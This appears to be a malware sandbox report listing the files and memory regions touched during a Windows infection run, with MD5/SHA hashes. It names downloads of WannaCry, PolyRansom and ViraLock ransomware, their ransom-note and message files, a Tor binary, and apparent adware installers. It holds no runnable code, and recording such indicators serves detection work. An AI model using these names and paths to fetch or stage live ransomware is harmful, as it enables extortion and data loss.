SHA256 3f9285a35db59170b643e567ab72b6cb988a9cc6b496d755bd1d002c702e3996
SHA512 cea105aac860b86c795c32544b34e26db2f1a0c4a4f243434d5a939fe37daffb93d0739562bb48d08bcf1d187d9275ff88f4b1bc943d466289db9db4cf0a5f74

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\prefs-1.js

MD5 b537aad54f6b0b38d1edbf5f6a25c0bb
SHA1 e02e3d73367bf20750da8e57b692865565608449
SHA256 e56a6b37867309e3d078b5ea0a78e99c25bf80e06558632e4070a4f6c70f2fa2
SHA512 fe1fc798662ed55f4e0ffd6b43b6f1bc58684f583b8d25302f06be32e77f76a1958a7b15d3fd7e590d6e94f6fb8d08d51c21409fbd7030920c41d661d9655914

C:\Users\Admin\Desktop\[email protected]

MD5 f6e05610d1ebdbddc3b1bc3fa3818513
SHA1 26ba26611d7f6f75422ee3c0a54782c25cf931f5
SHA256 11bb079e0fe52abd4c3d09a8bc6b59444c57f2bf75894539c14402cd8a094378
SHA512 aef89bccc866ce3f9cb429b9c4ef63e7bb6bfe374ad9bd9126f23bbaaab43332a76abc38f1aea7d5fc83cb06d733dbb3e536abd2aeb08670925c56bc135c31d1

C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp

MD5 0a8ad7de0afc794c795bb2eee08802aa
SHA1 8fb5466177e69993502d3990234281c826077193
SHA256 f016d3daadb81ad636290f98b92212daa2b8cdecf58d694ac6760a6165a19135
SHA512 1974255f5fcf01af17821708ef80827e28e24a7ad2da60846f2e76ab85eca29b59735b916decd4e90a7eb071b2ff0dd38e799acfab9e7aaeb5d09f1e00fab60d

C:\Users\Admin\AppData\Local\Temp\GLC8DB1.tmp

MD5 7b4571f62cac828b19e77d2a048a3501
SHA1 f1a20a73802d437882596e11a8478ac67951cd73
SHA256 6a21254f3840e3029598a7fd018f685772646a9f657ce13d98a6af8e76915626
SHA512 29f4ec3e46a91dd57b3328c1744eba5e4cd8f48bf9b91328bc89692d0cb722e9b84516d9854b17b98ff8ea8604f07fbc81afe9ae0ccd59afdb74a4692d546e37

C:\Users\Admin\AppData\Local\Temp\GLK8FB7.tmp

MD5 3df61e5730883b2d338addd7acbe4bc4
SHA1 03166e6230231e7e3583cf9c8944f4967aa1bf1b
SHA256 2efe9a54c8eb878711d9b6cd18f276838645aff52fe69d8a864376cb258ec616
SHA512 36e9d705d22dad3d952b4da578a990f2b63ec2f9fbf2734efdaea9ecbd4f07a8d7232792eb5bdd81c553354d51334993cb6103c377f3483a680eac9e41cd2087

C:\PROGRA~2\REGIST~1\UNWISE.EXE

MD5 443e13846997c537e8f5ed61130ab705
SHA1 6b10d458a5f1e3dbf8dfa96b118cf232d3a66f5f
SHA256 49ef36bd01b8ebf38c7b807a5fb44cbaf47c9d4efa883b01c41494c61ae4a2e2
SHA512 dd994d001f7de591cd03a7d875ec0a96be0dbf31ee7c2508ab67c701a27bdebdcb14dffd7f971f2dc5b86bb44443e4816880d73cacf7974b1731078a841fddb8

C:\Program Files (x86)\Registry Cleaner Trial\UninstRegclean.EXE

MD5 697f989f612b75e059e0ca4b01b27936
SHA1 a7b034fe8ff001a0ab72b255d3759648258593d9
SHA256 45021af7002fb2788944cbc9c7811149ca73f1f1d5f96b3fd04d54df3dd12d24
SHA512 c63b8794071aee38ba71e7f7da6cc29c9f0ec673abe7e32f03792380f50202ce31114bacf35999fcbf9176a11340a58cd83884fb2e0de7b1c5f523cac96c53f1

C:\PROGRA~2\REGIST~1\soref.dll

MD5 b913cfe476f93e11b7bc5d5115b33680
SHA1 b7e4735b18f5916e25d0c9ca29fc2bc2cd0b8340
SHA256 2da6aebed8590372212804a75ad10d7462dd9cf4a80bdc2240e208715ff2f473
SHA512 f53d361b9642d5f929e7670ea442f6fb73e7c2c62a8d8290891b05b2086c7c1dac1f41363d818f2a140c21f04f1fd21e9c745a93b4bd4ee3654819cf7caba3cd

C:\PROGRA~2\REGIST~1\~GLH000b.TMP

MD5 4132886ba9273cdf7d53464ca1120c41
SHA1 3ce17bb3783bae388adf9daa9d269edc7993bb30
SHA256 33c07d7b5e03f373aeac277d018c898b41a3bee24ac79567988c3b5717fcc1bc
SHA512 17c6a8c134e3164c033addb7640acec7e519e7ac6c247ed8b1653277a940ef1df64e73a40a1f5551d421b0c3a7d7054761207b622e9ec6b5211379b387fddc0f

C:\PROGRA~2\REGIST~1\~GLH000d.TMP

MD5 e1d12da2c612e53849e53c8aec1fad5a
SHA1 76a88d458350c2ba193eee28584c9ea8eb010150
SHA256 c5119edf381f590903faaa2663609e1cad93923626aeac6cb44611ab3746cd86
SHA512 1ed38cbd3bc036d615d476efe85124691720b54995c7f7d69a620937ff35285a46b70aa74c321f87378605ac5689f4e6b83261c7c074a1be2a745764bc0d2b1e

C:\PROGRA~2\REGIST~1\RCUNIN~1.EXE

MD5 f38ffacb3b348c4ca648fcbfc2543240
SHA1 a0b283f12ca615efef71f9f6c925b0e1a06ea191
SHA256 25a54fa88ba98bb0268d94311f4223f8684e9873219c0ddb55e8d4b4f449e642
SHA512 a54090e5793db33a791666befae292bbd5b7362aa94a5923f17dbfff7282437912d2d0c99c4b772d73e4fb3807331acc289240a3bfaddaeb76b947ba3da81dbf

C:\PROGRA~2\REGIST~1\~GLH0010.TMP

MD5 243b39d8b0d032382b978b015c32371e
SHA1 c6e8b1d4e20be0d46c2c02146f5f6607a100e49e
SHA256 7210ffb3d71cca681baf3da4bb976bfd5838bbf442b908b169f3235be6fc8e8b
SHA512 87f5cfcfb5a5ab27299520e2689422568ad307f70d067507a336263b7a2a022a622a1c5fed9ef9466ef5a2db2f74d773689bf588f776ead7eea8495d9917db60

C:\Users\Admin\AppData\Local\Temp\GLF997E.tmp

MD5 b9b41e50d612e00bf3a49a6405b89d74
SHA1 88063ee643c64f18fedda1890c717122634aedfd
SHA256 50e7a30e1825fab93b94b698c2c6d2cc1787b094c6cee53eeed5c497f77443c9
SHA512 b2486f526025095adc6767b5c2f85f80446db2b586e4dff376d74d44494f16d78a361dc944f3a10d8ad494b871a190e8c3f0e92eb27114be5d0b748e0da9c1ca

C:\Program Files (x86)\Registry Cleaner Trial\~GLH0011.TMP

MD5 f07a8626ed507cd4fffa0d82ff3ed49e
SHA1 980f7b153b1455a363960863729dad28dd1701cd
SHA256 99ac2e2d0edefa546c1cee10b6a3bd62d283242e0ffe6c4b1d5ee48872b65469
SHA512 5978772b772f2b8d64669385d55cff14f66fd33c2c6142dac35b83bd7259d556e8215f398b6dcdaf4c5da9e422f85480a92b8e4da746aed487e64f63abaafe8e

C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp

MD5 6f608d264503796bebd7cd66b687be92
SHA1 bb82145e86516859dae6d4b3bffb08c727b13c65
SHA256 49833d2820afb1d7409dfbd916480f2cdf5787d2e2d94166725beb9064922d5d
SHA512 c14b7ec747357c232f9d958b44760e3a018df628291e87de52b8174ccc4ada546eba90a0e70172d1db54feca01b40cd3aeaa61b8a2b6f22d414baad1f62e8e54

C:\PROGRA~2\SOFTWA~1\soproc.exe

MD5 ad33ea09b22a376be3ec32ae660e3c4e
SHA1 65f09c1e804a193ccbb8aa28d064081829b034f8
SHA256 c1d329d5d43f445e40d989dce9fc86f89ff4a8d167403dec4a8da715b636b735
SHA512 da49fb4a027c8530bb3e5c8d16d699d80a2d1dc5d0cad22e216034b8d8db9f1ba09cb3d7b0b29ed89d07c153313c3b0621a947bc86af85e3a57c749d3f0ffc62

memory/2864-4225-0x0000000000B80000-0x0000000000BC8000-memory.dmp

memory/2864-4230-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2864-4239-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2864-4244-0x0000000000B80000-0x0000000000BC8000-memory.dmp

memory/2864-4243-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2864-4242-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2864-4241-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2864-4245-0x0000000000B80000-0x0000000000BC8000-memory.dmp

memory/2864-4247-0x0000000000400000-0x0000000000989000-memory.dmp

C:\Program Files (x86)\Registry Cleaner Trial\License.rtf

MD5 ae5cc1d4984ed9771777602028ba68cc
SHA1 2cf663b71b59fe63152d066c44bf8481a12ed076
SHA256 e696ed198a36a237ef4f2cbd4d6510e2e25c3e65ba8ba163f7a07185de219140
SHA512 be4978ba633671043ffdce1fc5e206254ae0d4f18ee14a087f9da7df4577468a69ef93db432458b6497fdaa72c485ed03ec365dbe536cdd00d84af35e9077c33

memory/2768-4372-0x0000000002540000-0x0000000002588000-memory.dmp

memory/2768-4377-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2768-4380-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2768-4382-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2768-4384-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2768-4385-0x0000000002540000-0x0000000002588000-memory.dmp

memory/2768-4383-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2864-4386-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2768-4387-0x0000000002540000-0x0000000002588000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 51799568dacd0c57809858dc8c7c33e8
SHA1 07b07d7124c1789912866ec9feda6c38f51e8bc6
SHA256 228641c35fc0c2e538a2c16d143bafe2e8e99be6b5cfb397f887c91c3d604ca0
SHA512 126bdf9f57db58ca0e4a43500dfc7f60420b86c13991da6d711bcef43f4629afb8a7ffae8ecdc15ef7a37a94896431df1712f06a8b6e4704b011d838a9a8be63

memory/2768-4406-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2768-4423-0x0000000000400000-0x0000000000989000-memory.dmp

C:\Users\Admin\Downloads\CPURocket.cbdg2AQN.7z.part

MD5 b6a1c3dee30ae984547a08ba85b1ffbc
SHA1 7d6b6f2d114ce86ed8c2814ad4c920b5051eb98f
SHA256 bd99aad600f97f7ae57f5f3b813b3d981d5b6d7c49e90a3b1216b3d5b4e4a51b
SHA512 5d0dfa99fdb2639603e4c2756b36ce4265d9641c486db0671ae2d3bace52c58ee77047d317fa5aeebbc389c5f6f3d410fe8a96bd86e877834978e72aafd185e2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 f05827ce27ec77784c139c53cda52e5e
SHA1 b468b5272ba1d7930c43e39cb7beb5c2238b688d
SHA256 abd609db5c4923218a4a279b7c09f66ada773c71801c53f35add39f125df0c7e
SHA512 d2e707509caa228bcc60833ab76928d5ea4310b63752d9d6ac61f1d4a9efb4619a50c93f497f30067c240763ea552e6c0c5f7adffe30dff4a882c4285194558f

memory/2768-4454-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2768-4455-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2768-4461-0x0000000000400000-0x0000000000989000-memory.dmp

C:\Users\Admin\AppData\Roaming\Registry Cleaner\Backups\2024-08-09,23-46 03 880.zip

MD5 eb0fd69615cde99f23100ebb60f554ac
SHA1 70cd9f404e3a8ddf08d0eb721e77e46764826af5
SHA256 d1bcf2631b220182c9e5da2ea9764d4ed0f648a80c2c7a3e0ad68940b51698bf
SHA512 7ba427700c9be06bed6118c078a45b0fdf148eb6c524feb9676bbf71666a706a4c330d6b4c5cb020c92ec5c08eaf31a311eab961d3440b5e0ff46dea53461ffb

memory/2768-5154-0x0000000000400000-0x0000000000989000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GLF3849.tmp

MD5 26c35a28f01c012e8f021a9b2c02e006
SHA1 661b9cad3295d6efc9ba2f648881b9f45d94f66d
SHA256 0828ad31b93e50abc4ff6233d422caf7ff1e1153dc198970f43ae69a9fb149ef
SHA512 404e067828ffb3455725737a98bf85532b3eea377118e6889465b1d141bb62c194f6b3b44a07f4a4c978ddf48bcb326cf3a623d560c88920c35470d17f381756

C:\PROGRA~2\CPUROC~1\SOfsg.exe

MD5 840da1f353e8e255e000645b7145c18d
SHA1 b8561507d08ba0ee2ca0a48a9805131e72fa216e
SHA256 e095d9599dc08e313c1f8c34e9ed2a827967aeedcd18ca840839a9a9c15647eb
SHA512 a892c415ee238e83ad86ad3f495203e7fdf4bebcf0e9653b1fb551fe40b776471fa69785d29ecef85437501b16e2cbb2805c44dc6275c6a656108a65ff52cbb9

C:\PROGRA~2\CPUROC~1\HtmlDocs\Images\MTTOPB~1.JPG

MD5 4fb2c7cd08850f78395bac08979a0480
SHA1 818311acbab9922efb7f27185b7a66c751ee02d4
SHA256 d19987dd74c7229f05fae11afb1c5676255eec2893927bc85bece1f70cf37946
SHA512 950c266343b6f02f62c4915d9ef65522da7dd770e15ffc554a5d42f9e96952d0aa4279351e4ee6964a8d0d2489f2ae7e06d067545ce2c1c91ed774297be7a445

C:\PROGRA~2\CPUROC~1\HtmlDocs\index.htm

MD5 c317eeb45cde7bf108afa79b7e9c2b5a
SHA1 7ea4377165bc2ec0f2304aa7c7c2a4c39190bb76
SHA256 230cec4157ff29171b4caa29485d5239d78023a6ac3a413f19867017fbba9307
SHA512 000e4bbadd4c8e124df6bcee1bb8373672fbada4b9c2652a4ada48914695acc816209d24eca4e87d9c08693e62a0f7d6979f860dcd60f6fb2cace623ffe63822

C:\PROGRA~2\CPUROC~1\CPUROC~1.HLP

MD5 0b090541c3234ea7943de8819e44a28e
SHA1 b09383a564bd5a708c479fd9f19d12bc73ddbe46
SHA256 9c81c60399ced14875ef5a3c9a1dc649837326c549850a29140bfe87b536aa12
SHA512 d216dc68f5416d13bf1c4f1277a8abcbff34f437934f099c6329358456edb094346b8fda51f9a8e46fa1933bcc162ad5dd6e1d1b2532ae3b1c234c04fd90e76e

C:\PROGRA~2\CPUROC~1\CPUROC~1.DLL

MD5 5eec876ce6d83e4f0cbf415d8138a8a8
SHA1 2008830cfbfee2ab8325050a853c90b3e4287bbf
SHA256 692ed3aa45749b3ca1e6f484e2a956f32c102df6ad591d23aaf1fade8494256b
SHA512 7743b4b4a54cc43878cab872e634a9af0bb9e5d523dc561dd4508cb31ebfe19cafff4c04654e3b68eb12df0e2293e674431222349f674d1582d3805dbba2b5f3

C:\PROGRA~2\CPUROC~1\~GLH000e.TMP

MD5 132b5cf6e15b342312f917deb9521f63
SHA1 0287e368be5d0605ef7350cca1e33b3e390f6a6f
SHA256 cc8ab5d05e0db06aedca77e8201d6d031626e48e41751764727c776692b4b847
SHA512 d9172fdc4559a851c45aa17194f60ae634954765741f8c15d496181275feb03a19d9f40651f4db620824bfecfa45b44f92efddd9af23d6ff2e736fb5a1a5701d

C:\PROGRA~2\CPUROC~1\CPUROC~1.CNT

MD5 c69a8cd4e1ab29f33a7953fa4eab7335
SHA1 307ab0b167ae67b5744595f697c22e56595485a3
SHA256 f1325b6e54d74fa08b1d2132a4da7a2af91d70975eeb51117d2723a6e4ba46f3
SHA512 79e859c4dfaffe464f11adad16b953dc6a3bb244cd875878fe0b4618b9d83b92cb0ede6edaf43ff98b4af5b95094ceac11e147c0597abb6dbf0f1ab3121998b2

C:\PROGRA~2\CPUROC~1\HtmlDocs\logo.bmp

MD5 57d3ee18fa7d8ab6a3b7720ef5a68126
SHA1 cea84a6102ee79933ce54618ec32c2a67ea780b2
SHA256 7b4302a4bb115766b149723c5cd708f689f5bf960dbcd3a330cacee5840f83b0
SHA512 37f1f91fce3361f09c2c88e8f3b1e5509bc730e196df869db9fb87892e4081d3d03d002b40483151c642aab2d823f92b9f9191d1ec30d921f6e20aaf001fe262

C:\PROGRA~2\CPUROC~1\HtmlDocs\upgrade.htm

MD5 f858300208fbfc9b5977e86d50807ef5
SHA1 d5978a3d65a9f508bd9d2bd42494ea29c62d5b5d
SHA256 784066b4db56dd9a717b8a6adf1af506ca649803704a1a772c5f18c755c15aa4
SHA512 e6df23abaa5ba83b6f9986f2175c4672687dfcbd4bfc59e1d116d881aa28b84a1fc522f821fcfc4ce05cd7efb188b9b465d177177176c76225d93d81d0f4e446

C:\PROGRA~2\CPUROC~1\HtmlDocs\Images\mtscreen.jpg

MD5 35069456fe4e5a68f21de224abb65a66
SHA1 7f1ab2cb647b5cfbefe263f570dab871ed1caafb
SHA256 7fdcd33997fc27c922b4ba755884d6a7db0f40b96650c98399157cda748208f6
SHA512 bca03948da85be4123cc20b7b98f2da5874ab80bad7e1fff99709bf85bb915f7519b517cea606e2df0685d728d0b9a0a4ab64ff5e3ebebfb8855d5d9edfff415

C:\PROGRA~2\CPUROC~1\HtmlDocs\Images\TOPBAN~1.JPG

MD5 943ba1ba412ddf14b5c6ec1ce84e1320
SHA1 c6e6426fd19f5ca5476cc14e7ceeff864097889a
SHA256 ad884e044a2ceecd54d6a64a88696341f67319d9e0bb0cfc8e5739b5c2de3987
SHA512 8ed35534a20ade40718c6ea0e2eaaabab4d546afe25b0392ea955997b51a093be34dacb2709d87d9efeb510856c3fd8d977b7babd826abfb664fa25e0d6658c4

memory/2768-6645-0x0000000000400000-0x0000000000989000-memory.dmp

memory/9692-7676-0x0000000000400000-0x00000000004A2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4272559161-3282441186-401869126-1000\7dc3d09af957e1100b8fb5e8da82deea_e1cb8dfe-5215-4859-82e0-ad3714d680b0

MD5 d342e66503a0e5160fb917a2929ae4b5
SHA1 93254f90e02984a0630a11d8cfe4aac60cac4ea0
SHA256 a92efb608732dc7742e7f84fd9364a604a0e600b63872eb8ef82fc715c3bc86b
SHA512 0c5e13bd542cf1c76a8e4d1de369d380ae3c5e91064d228228e82ba8df912d3fda8d6403a2dd71f2accf880df56acba6a7b7d2243d6d8ac8462304e7ea56451b

memory/2768-8007-0x0000000000400000-0x0000000000989000-memory.dmp

memory/9692-8909-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2768-9170-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2768-9938-0x0000000000400000-0x0000000000989000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 ca66fc47b84683cd00ff9187d5b7b461
SHA1 75b562df09d55d2042f2c479ce07c46d2a916392
SHA256 c28fd1d9e3b164c6a2ad98fed24de4609a304365b03dd73d7060bc9976fdc8a6
SHA512 cdbf299128fd9a8f828bf96717073f802611cff7bfcb4a8396ff381136d6b9def76e85f643d4f31a28e3d87470a9b10a92304fc3824f8d9ce19caeb5bf6ea11d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 5578283903c07cc737a43625e2cbb093
SHA1 f438ad2bef7125e928fcde43082a20457f5df159
SHA256 7268c7d8375d50096fd5f773a0685ac724c6c2aece7dc273c7eb96b28e2935b2
SHA512 3b29531c0bcc70bfc0b1af147fe64ce0a7c4d3cbadd2dbc58d8937a8291daae320206deb0eb2046c3ffad27e01af5aceca4708539389da102bff4680afaa1601

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0487ced0fdfd8d7a8e717211fcd7d709
SHA1 598605311b8ef24b0a2ba2ccfedeecabe7fec901
SHA256 76693c580fd4aadce2419a1b80795bb4ff78d70c1fd4330e777e04159023f571
SHA512 16e1c6e9373b6d5155310f64bb71979601852f18ee3081385c17ffb943ab078ce27cd665fb8d6f3bcc6b98c8325b33403571449fad044e22aa50a3bf52366993

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1a87fd4b287ce44060072c345d369c23
SHA1 602b01da868efe2476a5b400e782a9b0d49e2ad2
SHA256 3867efc02ad6d4e285bb796e19913e623cf62227418b54f0eac9cd79fbc6b5f2
SHA512 ba9d55081c36655bfbc03a2baa5d80083efb9821d1989545da5f82a78efad52dfc6cbf4e99c19fdb13c179914d2fb3d20e2b427680d2c446a76a55fe8a8afa0c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 3cbd4c6c895f5a31aa9a44faea4a5c47
SHA1 35ca908c36b93432e363095579b24c247bb55b10
SHA256 d7e2a192b86e17729a4905ffc70a25b18e71d9c7bc25ec7c97f3a25454d3ec86
SHA512 b8a069f14d87f35acd1bb591680398938175a8363743779825023565d36e959e04ef9c7a90c5d6a68eec8a4e382efaff2790e78f9e564e1b81458062dca7d99e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6a874311851c7c14f090bcd51953a92d
SHA1 9a224779cdf5838820071456311749b6618f3178
SHA256 e8eff0fc25cfd5e170ac8a1d320eb85d0f514fd6c434ae0430b25da1a614c998
SHA512 6b14ae0ea2fdf4c65056e167f80dcea6666bb7bd3ba06a8d332c96abbac276829d396f84c40fae5a1d514d07922ca838c6ebc355737739094841c33ccf6646f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 8d660b6ed8c2b0db09324e321ca8ed5f
SHA1 70866f460dc906ae10c674413d9db438df182284
SHA256 ab8af1fdbfbdb462da66e37d68ff6222df0b22164b2974716f675fc69a9ba233
SHA512 872806a54d50e937159cb162d5bd3cd5201ac82a9fb6b403e7d05f28e931d05d6e6deb93d222d87d0b4c2e17428116100836dc765c8af563154c44167a3b2077

C:\Users\Admin\Downloads\WannaCrypt0r.stNtHzj5.zip.part

MD5 e58fdd8b0ce47bcb8ffd89f4499d186d
SHA1 b7e2334ac6e1ad75e3744661bb590a2d1da98b03
SHA256 283f40e9d550833bec101a24fd6fd6fbd9937ed32a51392e818ffff662a1d30a
SHA512 95b6567b373efa6aec6a9bfd7af70ded86f8c72d3e8ba75f756024817815b830f54d18143b0be6de335dd0ca0afe722f88a4684663be5a84946bd30343d43a8c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9lt6socl.default-release\cache2\doomed\16276

MD5 97ef869fc2de890c9056aef757497d1e
SHA1 1702a3f8c569787f3c26a816afa0f2e65597e446
SHA256 6f88bb3858c6c0d8b58e12268af865ef7acb638cc8b3150d45ff4316e8da79f8
SHA512 1ca1676cf94e1a809c206eb938815c8a1e64bba03f1a802ed387497c0f51f6375138e650a3e4cdb4284ffa993d4c15999632e5bf5a9595fa1617174eb0233c08

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 de4b45f8028114cf9130710a29305037
SHA1 f6f6649e7038797e5bdf95e8fa98edf1dd3ee07c
SHA256 e048a986152d7f5c2390d00253bc3ac2aa3031bab9469489521c4bb6ccdb9192
SHA512 5d615e3d9480fa1384e96266d4da3dc0acdb023de284f4dae8db4ac0e9b1fb7edf1e6264b95347480b2f9ba52f1e5625a88365299b289c2ab9e9d2cae867cc74

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 41b4e662302c0dd6aea2ff8771d3d674
SHA1 5a48ec3876e3d7553aeb8f4a8cf38314d8522446
SHA256 2e5bef7b017ca5c5855740e069ebb678e25a9927863665218abe541617d20434
SHA512 229957ac19ecfd2e0aa70ec08c92e774afe3b62db0897e60e867aec814a8b7c350636680578e13792d864cf5fe3e03c2a7e4f3ac86c21d39d26cff950eb4a069

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9lt6socl.default-release\jumpListCache\cegctLQyW7LZbP5at112o5HQigcvBZ7A4WyaHOJVDn0=.ico

MD5 6b120367fa9e50d6f91f30601ee58bb3
SHA1 9a32726e2496f78ef54f91954836b31b9a0faa50
SHA256 92c62d192e956e966fd01a0c1f721d241b9b6f256b308a2be06187a7b925f9e0
SHA512 c8d55a2c10a2ef484dedded911b8f3c2f5ecb996be6f6f425c5bd4b4f53eb620a2baccd48bac1915a81da9a792971d95ff36c3f216075d93e5fd7a462ecd784f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 43b616766cadb2021ce290732c2cc0ce
SHA1 86e34b8113433a0056e4e778d0bb4d87a23d929d
SHA256 00fa13c96e6cc9fce9b661d8229812cb94c11ed38cc90cadb2243a632006b417
SHA512 9a253e8910e888afca5bb833d1fce70dec927f129b7fa94d1cab83b45c8be02de20b41c43fbc4e5965be75bc4b53a5ecac15237348d3729135ea08556ecdf064

memory/12304-10135-0x0000000000400000-0x0000000000989000-memory.dmp

memory/2768-10144-0x0000000000400000-0x0000000000989000-memory.dmp

C:\Users\Admin\Desktop\msg\m_finnish.wnry

MD5 35c2f97eea8819b1caebd23fee732d8f
SHA1 e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA256 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

C:\Users\Admin\Desktop\@[email protected]

MD5 7a2726bb6e6a79fb1d092b7f2b688af0
SHA1 b3effadce8b76aee8cd6ce2eccbb8701797468a2
SHA256 840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5
SHA512 4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

C:\@[email protected]

MD5 7bf2b57f2a205768755c07f238fb32cc
SHA1 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256 b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA512 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

MD5 334596c37e1274f300324bf75c0c0f46
SHA1 781599b0082a85bbffc6c51c04ccf38e594d16e3
SHA256 ea54715fc47067d5e85c1157c56b01eebafa2c0ea04705d9c45656b0aaa6c70b
SHA512 0594f7363e75b1d4d924fddf5e86de3da46c770b0b903982bb767bda12a49da1ffc14ff4b80a3e49e1e43b294bf04d50df4324325e42eb7f4e85ce0ef45a912b

C:\Users\Default\Desktop\@[email protected]

MD5 c17170262312f3be7027bc2ca825bf0c
SHA1 f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256 d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512 c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

C:\Users\Admin\Desktop\TaskData\Tor\tor.exe

MD5 fe7eb54691ad6e6af77f8a9a0b6de26d
SHA1 53912d33bec3375153b7e4e68b78d66dab62671a
SHA256 e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA512 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

C:\Users\Admin\Downloads\PolyRansom.hekmTEcp.zip.part

MD5 7a5ab2552c085f01a4d3c5f9d7718b99
SHA1 e148ca4cce695c19585b7815936f8e05be22eb77
SHA256 ed8d4bb55444595fabb8172ee24fa2707ab401324f6f4d6b30a3cf04a51212d4
SHA512 33a0fe5830e669d9fafbc6dbe1c8d1bd13730552fba5798530eeb652bb37dcbc614555187e2cfd055f3520e5265fc4b1409de88dccd4ba9fe1e12d3c793ef632

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 cb9a871e042e982d966417447b4c75e7
SHA1 3eaa1b73da3fd648cfe49c159fb57a5b64ec6a5f
SHA256 a38dab98332d159b03120fbc7fe3fa7470bb0c4803bd4025282847b69cad410b
SHA512 371b5931665ef6d8a2610cce88b1908f76a78bddc7fb3152fffcb35d3b8a3fa939b412477963d50ede189e11f70ad3bd2767fd1560906d048a8753ae763c5dab

C:\Users\Admin\Downloads\ViraLock.MPEyn8ML.zip.part

MD5 6a47990541c573d44444f9ad5aa61774
SHA1 f230fff199a57a07a972e2ee7169bc074d9e0cd5
SHA256 b161c762c5894d820cc10d9027f2404a6fec3bc9f8fd84d23ff1daef98493115
SHA512 fe8a4fd268106817efc0222c94cb26ad4ae0a39f99aacaa86880b8a2caa83767ffe8a3dd5b0cdcc38b61f1b4d0196064856bd0191b9c2d7a8d8297c864a7716d

C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

MD5 9e8c32680a1d4cbddca43b33a59f8a22
SHA1 c8b20fd3032a4664d2d9a96ed774844926d7cc2f
SHA256 1688a629ac193e7755f30cf981f4f779789cc5d62cae25e76f35fe3539d47212
SHA512 a7569ed92d82af7f5e7e8ed66465f87ccce2d1f2256da4de60cc685b34da4b86a803affc84b8cc9ab29add070222c5ef36f08fa5c7a67bbd28152bd27571f5c4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 4ca12f4d3831470119891f5ffb08f8d2
SHA1 8591a3bbda2a65e5ae9789f96f835359816d1190
SHA256 a799bcd7b4b8d19144a658090a6a35c68db76a32f44a8029f2e38ef71543e67d
SHA512 a7a34f27a3d69686a6646e6c55d5c4b87df3345ac7a529e6311ab626cda9910093d101b3297c25caef65f89d0732e0e27721083de3b4d0af4aa4f3bf04189870

